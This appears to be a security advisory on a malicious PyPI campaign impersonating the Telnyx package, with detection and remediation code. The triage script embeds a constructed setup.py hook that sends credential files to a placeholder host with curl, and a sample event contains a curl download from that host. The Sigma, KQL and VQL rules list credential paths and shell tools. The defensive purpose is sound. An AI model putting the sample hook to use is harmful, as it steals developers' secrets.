A new campaign by the threat actor known as TeamPCP has been identified targeting developers utilizing the Telnyx SDK on the Python Package Index (PyPI). Discovered by researchers at Socket and Endor Labs, this attack involves the publication of malicious packages designed to impersonate or compromise the integrity of the legitimate telnyx library.
The objective is clear: credential theft. By injecting malicious code into the software supply chain, TeamPCP aims to exfiltrate sensitive API keys, cloud credentials, and developer tokens from the environments where this compromised code is executed. For SOC analysts and DevSecOps engineers, this represents a critical risk vector. If a CI/CD pipeline or developer workstation pulls this malicious package, the breach is immediate and often bypasses traditional perimeter defenses. We need to pivot from "trust" to "verify" immediately within our Python environments.
Technical Analysis
Affected Products and Platforms
- Platform: Python Package Index (PyPI)
- Targeted Ecosystem: Python developers and applications integrating Telnyx communication services.
- Attack Vector: Software Supply Chain Compromise (Malicious Package Upload / Typosquatting).
Vulnerability and Attack Chain
This is not a vulnerability in the Telnyx software itself, but rather an abuse of the package repository ecosystem. The attack chain typically follows this pattern:
- Initial Compromise: The threat actor uploads a malicious package to PyPI. In this campaign, TeamPCP used names or metadata designed to confuse users looking for the legitimate `telnyx` library.
- Execution: On installation (`pip install`), the malicious package runs code placed in `setup.py` or `__init__.py`. A `setup.py` payload fires during the build step of a source distribution, before the developer has written a single line that imports the package; wheels run nothing at install time, so a payload in `__init__.py` fires on the first `import telnyx` instead.
- Payload Delivery: The script initiates a reverse shell or data exfiltration mechanism. TeamPCP payloads are known to search for and steal:
  - `.env` files (containing API keys and secrets)
  - AWS/GCP/Azure credential files
  - SSH keys
  - Browser cookies/stored passwords
- C2 Communication: The stolen data is transmitted to a Command and Control (C2) server operated by the attackers.
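Because the install-time hook is the step that turns a `pip install` into a breach, it is worth triaging a package's `setup.py` before pip executes it. The following Python script is an added example (not part of the advisory, and not TeamPCP or Telnyx code): it parses the file with the standard `ast` module and scores the signals a credential-stealing hook needs. The two sample `setup.py` sources it scores are constructed for the demo, and the exfiltration host in the malicious one is a placeholder under the reserved `.invalid` TLD.

```python
"""Static pre-install triage of a package's setup.py / __init__.py.

Added example, not code from the advisory, Telnyx or TeamPCP. It flags
network/shell/encoding imports, literals naming credential stores, dangerous
calls, and code that runs at `pip install` time (module-level calls other than
setup(), or a custom cmdclass). Both samples below are constructed.
"""
import ast
import re
from dataclasses import dataclass, field

# Modules a metadata-only setup.py has no reason to import.
SUSPICIOUS_MODULES = {"subprocess", "socket", "urllib", "requests", "http",
                      "base64", "zlib", "marshal", "ctypes", "pty"}
# The stores the attack chain above says the payload goes after.
CREDENTIAL_PATTERNS = re.compile(
    r"\.env\b|\.aws/credentials|\.azure|gcloud|\.ssh/id_|\.kube/config|"
    r"Login Data|Cookies|\.git-credentials|AWS_SECRET_ACCESS_KEY")
DANGEROUS_CALLS = {"exec", "eval", "os.system", "os.popen", "subprocess.Popen",
                   "subprocess.run", "subprocess.call", "subprocess.check_output"}


@dataclass
class Finding:
    kind: str    # import | credential_path | dangerous_call | cmdclass | top_level_call
    lineno: int
    detail: str


@dataclass
class Report:
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Threshold: a suspicious import plus at least one other signal.
        kinds = [f.kind for f in self.findings]
        return "import" in kinds and len(kinds) >= 2


def triage_install_hook(source: str) -> Report:
    """Score one setup.py / __init__.py without executing it."""
    report = Report()
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            mods = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        else:
            mods = []
        for mod in mods:
            if mod.split(".")[0] in SUSPICIOUS_MODULES:
                report.findings.append(Finding("import", node.lineno, mod))
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if CREDENTIAL_PATTERNS.search(node.value):
                report.findings.append(Finding("credential_path", node.lineno, node.value))
        if isinstance(node, ast.Call):
            func = ast.unparse(node.func)
            if func in DANGEROUS_CALLS or func.startswith("base64."):
                report.findings.append(Finding("dangerous_call", node.lineno, func))
            # A cmdclass hook runs arbitrary code inside `pip install`.
            if func.endswith("setup") and any(kw.arg == "cmdclass" for kw in node.keywords):
                report.findings.append(Finding("cmdclass", node.lineno, "setup(cmdclass=...)"))
    # A module-level call other than setup() executes merely by importing the file.
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            func = ast.unparse(stmt.value.func)
            if not func.endswith("setup"):
                report.findings.append(Finding("top_level_call", stmt.lineno, func))
    return report


# Constructed samples: a metadata-only setup.py, and one with an install hook of the
# kind the attack chain describes (reads credential files, posts them to a host).
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="telnyx", version="0.0.0", packages=find_packages())
'''

MALICIOUS_SETUP = '''
import os, base64, subprocess
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        for p in ("~/.aws/credentials", "~/.env", "~/.ssh/id_rsa"):
            path = os.path.expanduser(p)
            if os.path.exists(path):
                subprocess.run(["curl", "-s", "-d", "@" + path, "http://c2.invalid/drop"])

setup(name="telnyx", version="9.9.9", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("malicious", MALICIOUS_SETUP)):
        report = triage_install_hook(src)
        print(f"{label}: suspicious={report.suspicious}, findings={len(report.findings)}")
```

To use it on a real candidate, fetch the source distribution without installing it (`pip download --no-deps --no-binary :all: telnyx==<version>`), unpack it, and pass the text of `setup.py` to `triage_install_hook()`. The check is heuristic: an obfuscated hook that `exec()`s a base64-decoded blob hides its strings, but the `exec`/`base64` combination is itself scored.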
Exploitation Status
- Status: Confirmed Active Exploitation (In-the-Wild).
- Source: Socket and Endor Labs have confirmed the existence of the malicious packages targeting Telnyx users.
Detection & Response
SIGMA Rules
The following Sigma rules focus on the post-exploitation behavior typical of TeamPCP and similar Python supply chain attacks: credential-file access by the Python interpreter, and shells spawned from the package installation process. The first two target Windows file-access and process-creation telemetry, the third Linux file access. Expect tuning on the file-access rules: Python applications legitimately read `.env` files (python-dotenv) and `~/.aws/credentials` (boto3), so the strongest signal is such an access shortly after a `pip install` on the same host.
```yaml
title: Python Script Accessing Sensitive Credential Files
id: 8a4b2c1d-5e6f-4a7b-8c9d-0e1f2a3b4c5d
status: experimental
description: |
    Detects Python processes reading credential stores (.env, .aws\credentials, SSH private keys, known_hosts,
    kubeconfig), the collection behaviour of supply chain credential theft payloads like TeamPCP.
    Correlate with a pip install on the same host shortly before the access.
references:
    - https://www.infosecurity-magazine.com/news/teampcp-targets-telnyx-pypi-package/
author: Security Arsenal
date: 2025/03/18
tags:
    - attack.credential_access
    - attack.t1552.001
    - attack.t1552.004
logsource:
    category: file_access
    product: windows
detection:
    selection_python:
        Image|endswith:
            - '\python.exe'
            - '\python3.exe'
            - '\pythonw.exe'
    selection_env:
        TargetFilename|endswith: '\.env'
    selection_paths:
        TargetFilename|contains:
            - '\.aws\credentials'
            - '\.azure\'
            - '\.ssh\id_'
            - '\.ssh\known_hosts'
            - '\.kube\config'
    condition: selection_python and (selection_env or selection_paths)
falsepositives:
    - Applications loading their own .env via python-dotenv
    - AWS/Azure SDKs and CLIs written in Python reading the user's credential files
    - IDE tooling and test runners that read project configuration
level: medium
```
```yaml
title: Suspicious Child Process of Pip Installer
id: 9b5c3d2e-6f7a-5b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: |
    Detects a shell (cmd.exe, powershell.exe, pwsh.exe) spawned during a pip install, which may indicate a
    malicious setup script executing a payload. pip runs setup.py and PEP 517 build hooks in a separate
    python.exe subprocess, so the shell's direct parent is usually that python.exe (its command line
    references setup.py or pip's _in_process.py hook runner), not pip.exe itself.
references:
    - https://attack.mitre.org/techniques/T1059/
author: Security Arsenal
date: 2025/03/18
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1059.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_pip_parent:
        ParentImage|endswith:
            - '\pip.exe'
            - '\pip3.exe'
    selection_python_build:
        ParentImage|endswith:
            - '\python.exe'
            - '\python3.exe'
        ParentCommandLine|contains:
            - 'setup.py'
            - '_in_process.py'
            - 'pip'
    selection_shell:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
    condition: (selection_pip_parent or selection_python_build) and selection_shell
falsepositives:
    - Legitimate post-install scripts that configure the environment
    - Build backends that shell out while compiling native extensions
level: medium
```
```yaml
title: Linux Python Process Accessing Credential Files
id: 0c6d4e3f-7a8b-6c9d-0e1f-2a3b4c5d6e7f
status: experimental
description: |
    Detects a Python interpreter on Linux opening .env, cloud credential, kubeconfig or SSH private key files,
    indicative of credential harvesting malware in supply chain attacks. Requires file-access telemetry that
    records the accessing executable, e.g. auditd watch rules on the credential paths
    (-w /root/.aws/credentials -p r -k cred_read).
references:
    - https://www.infosecurity-magazine.com/news/teampcp-targets-telnyx-pypi-package/
author: Security Arsenal
date: 2025/03/18
tags:
    - attack.credential_access
    - attack.t1552.001
    - attack.t1552.004
logsource:
    category: file_access
    product: linux
detection:
    selection_python:
        exe|contains: '/bin/python'
    selection_files:
        name|endswith:
            - '/.env'
            - '/.aws/credentials'
            - '/.kube/config'
    selection_ssh:
        name|contains: '/.ssh/id_'
    condition: selection_python and (selection_files or selection_ssh)
falsepositives:
    - Developer reading own config files manually
    - Applications and cloud SDKs loading their own configuration at startup
level: medium
```
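Before deploying the process-tree rule it pays to run its logic over a sample process tree. The Python below is an added example, not part of the advisory: a minimal evaluator for the Sigma subset the rules use (`field|endswith`, `field|contains`, lists OR-ed within a field, fields AND-ed within a selection), applied to five constructed Windows process-creation events whose command lines imitate pip's build subprocess. The events are illustrative, not captured telemetry.

```python
"""Check the process-tree Sigma logic against a constructed pip install.

Added example, not part of the advisory. Real pip invokes setup.py and build
hooks from a child python.exe, so the rule has to accept that python.exe as the
parent, not only pip.exe; event e2 below is that tree, e5 the direct pip child.
"""


def _field_matches(value: str, modifier: str, patterns) -> bool:
    """Sigma list semantics: any pattern in the list matching the field is enough."""
    v = value.lower()
    if isinstance(patterns, str):
        patterns = [patterns]
    for p in (p.lower() for p in patterns):
        if modifier == "endswith" and v.endswith(p):
            return True
        if modifier == "contains" and p in v:
            return True
        if modifier == "" and v == p:
            return True
    return False


def match_selection(selection: dict, event: dict) -> bool:
    """Every `field|modifier` key in a selection must match (implicit AND)."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        if value is None or not _field_matches(value, modifier, patterns):
            return False
    return True


# The three selections of the "Suspicious Child Process of Pip Installer" rule above.
SELECTION_PIP_PARENT = {"ParentImage|endswith": [r"\pip.exe", r"\pip3.exe"]}
SELECTION_PYTHON_BUILD = {
    "ParentImage|endswith": [r"\python.exe", r"\python3.exe"],
    "ParentCommandLine|contains": ["setup.py", "_in_process.py", "pip"],
}
SELECTION_SHELL = {"Image|endswith": [r"\cmd.exe", r"\powershell.exe", r"\pwsh.exe"]}


def pip_child_shell(event: dict) -> bool:
    """condition: (selection_pip_parent or selection_python_build) and selection_shell"""
    parent_ok = match_selection(SELECTION_PIP_PARENT, event) or match_selection(
        SELECTION_PYTHON_BUILD, event)
    return parent_ok and match_selection(SELECTION_SHELL, event)


# Constructed events. e2 is the tree a malicious setup.py actually produces:
# pip.exe -> python.exe (running setup.py) -> cmd.exe. The C2 host is a placeholder.
BUILD_CMDLINE = (
    r'"C:\Python312\python.exe" -c "import setuptools, tokenize; '
    r"sys.argv[0] = 'C:\\Users\\dev\\AppData\\Local\\Temp\\pip-install-x1\\telnyx\\setup.py'; "
    r'..."')
SAMPLE_EVENTS = [
    {"id": "e1", "ParentImage": r"C:\Python312\Scripts\pip.exe", "ParentCommandLine": "pip install telnyx",
     "Image": r"C:\Python312\python.exe", "CommandLine": BUILD_CMDLINE},
    {"id": "e2", "ParentImage": r"C:\Python312\python.exe", "ParentCommandLine": BUILD_CMDLINE,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c curl -s http://c2.invalid/x -o %TEMP%\x"},
    {"id": "e3", "ParentImage": r"C:\Python312\python.exe", "ParentCommandLine": r"python.exe C:\app\manage.py runserver",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "powershell.exe -c Get-Date"},
    {"id": "e4", "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"id": "e5", "ParentImage": r"C:\Python312\Scripts\pip.exe", "ParentCommandLine": "pip install telnyx",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]


def alerts(events) -> list:
    """Return the ids of the events the rule fires on."""
    return [e["id"] for e in events if pip_child_shell(e)]


if __name__ == "__main__":
    print("alerts:", alerts(SAMPLE_EVENTS))
```

Event e3 (a Django dev server spawning PowerShell) shows the trade-off of the `pip` substring: it stays quiet here because the parent command line contains neither `pip` nor `setup.py`, but a Python process launched from a path such as `C:\pipeline\` would match; tighten the pattern to `\pip\` or `pip\_vendor` if that is noisy in your estate.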
KQL (Microsoft Sentinel)
This query hunts for shells and download utilities launched from a pip install, and for command lines that name secret stores. Microsoft Defender for Endpoint records file creation, modification, rename and delete events but not file reads, so "python opened `.env`" is not visible in `DeviceFileEvents`; the process lineage of the install is, and that is what the query pivots on.

```kql
// Hunt for shells or download tools launched by a pip install (malicious setup.py / build hook).
// pip runs setup.py and build hooks in a child python.exe, so accept both pip.exe and a python.exe
// whose command line references pip or setup.py as the initiating process.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("pip.exe", "pip3.exe", "python.exe", "python3.exe", "pythonw.exe")
| where InitiatingProcessCommandLine has_any ("pip", "setup.py", "_in_process.py")
| where FileName in~ ("cmd.exe", "powershell.exe", "pwsh.exe", "bash.exe", "curl.exe", "certutil.exe", "bitsadmin.exe")
    or ProcessCommandLine has_any (".env", ".aws", ".azure", ".ssh", "credentials")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
```
Velociraptor VQL
Use the following VQL in a Velociraptor hunt. The first query is a live view: Python processes whose command line names a credential store, which catches a running harvester or reverse shell but not a `setup.py` payload that has already exited. The second query looks at disk state, listing every installed distribution whose name matches `telnyx` together with its modification time, so an unexpected version or a second copy installed next to the legitimate one stands out.

```vql
// 1. Live: Python processes whose command line names a credential store.
SELECT Pid, Ppid, Name, CommandLine, Exe, Username, CreateTime
FROM pslist()
WHERE Name =~ "python"
  AND CommandLine =~ "[.]env|[.]aws/credentials|[.]kube/config|known_hosts|[.]ssh/id_"

// 2. On disk: every telnyx-like distribution, with its install/modification time.
SELECT OSPath, Name, Mtime
FROM glob(globs=["/usr/lib/python3*/site-packages/*telnyx*.dist-info",
                 "/usr/local/lib/python3*/*-packages/*telnyx*.dist-info",
                 "/home/*/.local/lib/python3*/site-packages/*telnyx*.dist-info",
                 "/home/*/**/site-packages/*telnyx*.dist-info"])
```
Remediation Script (Bash)
The following script helps audit a Linux environment: it shows the installed `telnyx` package with its file list, lists distributions installed or modified in the last 24 hours, and purges the pip cache so a malicious wheel cannot be reinstalled from it. It does not remove anything automatically; removal and reinstallation are left to the operator after review, because PyPI packages carry no vendor signature that pip verifies, and the Author/Home-page metadata shown by `pip show` is set by whoever uploaded the package.

```bash
#!/bin/bash
# Audit and Remediation for TeamPCP PyPI Supply Chain Attack
# Targeting Telnyx package impersonation
set -u
PIP="${PIP:-python3 -m pip}"   # use the interpreter of the environment being audited

echo "[*] Starting audit for Telnyx package compromise..."

# Function to show package metadata and the files it installed
check_package() {
    pkg_name=$1
    echo "[+] Checking package: $pkg_name"
    $PIP show -f "$pkg_name"
}

# 1. Check if Telnyx is installed and list details
if $PIP show telnyx > /dev/null 2>&1; then
    echo "[!] Telnyx package is installed. Reviewing metadata and file list..."
    check_package telnyx
    echo "[!] Note: Author/Home-page are set by whoever uploaded the package; do not trust them alone."
    echo "[!] Compare the Version and the 'Files:' list against the release on https://pypi.org/project/telnyx/"
    echo "[!] A version PyPI never published, or extra files (.pth, unexpected modules, binaries), means compromise."
    echo "[!] If suspicious, run: $PIP uninstall telnyx -y"
else
    echo "[info] Telnyx package not found in current environment."
fi

# 2. List distributions installed or modified in the last 24 hours
#    (wheels write *.dist-info, legacy sdist installs write *.egg-info)
echo "[*] Checking for packages installed/modified in the last 24 hours..."
find /usr/lib/python3*/site-packages /usr/local/lib/python*/dist-packages /usr/local/lib/python*/site-packages \
     /home/*/.local/lib/python*/site-packages /home/*/*/.venv/lib/python*/site-packages \
     -maxdepth 1 \( -name "*.dist-info" -o -name "*.egg-info" \) -mtime -1 2>/dev/null

# 3. Purge pip cache so a malicious wheel is not reinstalled from the local cache
echo "[*] Clearing pip cache to remove potential malicious artifacts..."
$PIP cache purge

echo "[*] Audit complete. Please review the output manually."
echo "[*] Recommendation: reinstall from a pinned, hash-verified requirement, e.g."
echo "    $PIP install --no-cache-dir --force-reinstall --require-hashes -r requirements.txt"
```
Remediation
- Immediate Audit: Run the remediation script above or manually inspect installed Python packages.
  - Command: `pip list`
  - Identify the installed `telnyx` package version.
- Verify Integrity: Compare the installed version (`pip show telnyx`) with the releases published on the official Telnyx PyPI page. Treat a version that does not exist on PyPI, or files in `pip show -f telnyx` that the official wheel does not contain, as a compromise. The Author and Home-page fields are supplied by the uploader, so a matching field proves nothing on its own.
- Removal: If a malicious package is identified:
  - Command: `pip uninstall telnyx -y`
  - Rotate all credentials (API keys, tokens, passwords) that may have been present in environment variables or configuration files on the affected host. Because the payload can open a reverse shell, also review the host for persistence rather than assuming the damage stopped at file reads.
- Reinstallation: Install the legitimate package directly from PyPI, bypassing the local pip cache:
  - Command: `pip install --no-cache-dir telnyx`
- Dependency Pinning: Update your `requirements.txt` or `pyproject.toml` to pin the `telnyx` package to a known-good version and hash (a `telnyx==<version> --hash=sha256:<digest>` line, installed with `pip install --require-hashes`), so that a future resolution to a different artifact fails instead of silently drifting.
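The integrity and pinning steps above can be scripted. The Python below is an added example (not pip's or Telnyx's code) that implements both: `verify_record()` recomputes the sha256 of every file the package's `.dist-info/RECORD` lists and reports modified, missing and unlisted files, which catches a package altered after install (RECORD is written by whoever built the wheel, so it cannot vouch for a malicious upload); `pinned_requirement()` emits the hash-pinned requirement line that `pip install --require-hashes` enforces. The distribution it checks is constructed in a temporary directory; nothing touches the real environment.

```python
"""Verify an installed distribution against its RECORD and pin a hash for reinstall.

Added example, not pip's or Telnyx's code. make_sample_dist() builds a throwaway
site-packages tree with placeholder file contents; tamper() simulates the kind
of post-install modification RECORD verification is meant to catch.
"""
import base64
import csv
import hashlib
import tempfile
from pathlib import Path


def _record_digest(data: bytes) -> str:
    """RECORD stores sha256 as urlsafe base64 with '=' padding stripped."""
    raw = hashlib.sha256(data).digest()
    return "sha256=" + base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def verify_record(site_packages: Path, dist_info: str) -> dict:
    """Compare on-disk files with the hashes recorded at install time."""
    listed = {}
    with (site_packages / dist_info / "RECORD").open(newline="") as fh:
        for path, digest, _size in csv.reader(fh):
            listed[path] = digest
    result = {"modified": [], "missing": [], "unlisted": []}
    for rel, digest in sorted(listed.items()):
        if not digest:            # RECORD lists itself with an empty hash
            continue
        target = site_packages / rel
        if not target.is_file():
            result["missing"].append(rel)
        elif _record_digest(target.read_bytes()) != digest:
            result["modified"].append(rel)
    # Files inside the package's own directories that RECORD never mentioned
    # (a dropped loader module or .pth file is how a tampered install persists).
    for top in sorted({Path(rel).parts[0] for rel in listed}):
        for f in sorted((site_packages / top).rglob("*")):
            rel = f.relative_to(site_packages).as_posix()
            if f.is_file() and rel not in listed:
                result["unlisted"].append(rel)
    return result


def pinned_requirement(name: str, version: str, artifact: bytes) -> str:
    """Requirement line for the exact wheel/sdist bytes fetched from PyPI (pass Path.read_bytes())."""
    return f"{name}=={version} --hash=sha256:{hashlib.sha256(artifact).hexdigest()}"


DIST_INFO = "telnyx-1.0.0.dist-info"


def make_sample_dist(site_packages: Path) -> None:
    """Constructed stand-in for an installed package; file contents are placeholders."""
    files = {
        "telnyx/__init__.py": b"from .api import Client\n",
        "telnyx/api.py": b"class Client:\n    pass\n",
        f"{DIST_INFO}/METADATA": b"Name: telnyx\nVersion: 1.0.0\n",
    }
    rows = []
    for rel, data in files.items():
        path = site_packages / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(data)
        rows.append([rel, _record_digest(data), str(len(data))])
    rows.append([f"{DIST_INFO}/RECORD", "", ""])
    with (site_packages / DIST_INFO / "RECORD").open("w", newline="") as fh:
        csv.writer(fh, lineterminator="\n").writerows(rows)


def tamper(site_packages: Path) -> None:
    """Simulate post-install modification: patch __init__.py and drop an extra module."""
    init = site_packages / "telnyx" / "__init__.py"
    init.write_bytes(init.read_bytes() + b"import telnyx._loader\n")
    (site_packages / "telnyx" / "_loader.py").write_bytes(b"# placeholder for injected code\n")


def demo() -> tuple:
    """Return (clean_result, tampered_result) for the constructed distribution."""
    site_packages = Path(tempfile.mkdtemp(prefix="sp-"))
    make_sample_dist(site_packages)
    clean = verify_record(site_packages, DIST_INFO)
    tamper(site_packages)
    return clean, verify_record(site_packages, DIST_INFO)


if __name__ == "__main__":
    clean, tampered = demo()
    print("clean:   ", clean)
    print("tampered:", tampered)
    print(pinned_requirement("telnyx", "1.0.0", b"<bytes of the downloaded wheel>"))
```

Point `verify_record()` at a real environment with `site_packages = Path(sysconfig.get_paths()["purelib"])` and the `*.dist-info` directory name from `pip show -f`. For the pin, hash the artifact you downloaded and inspected (`pip download --no-deps telnyx==<version>`) rather than a file already in the pip cache, which is exactly what the remediation script purges.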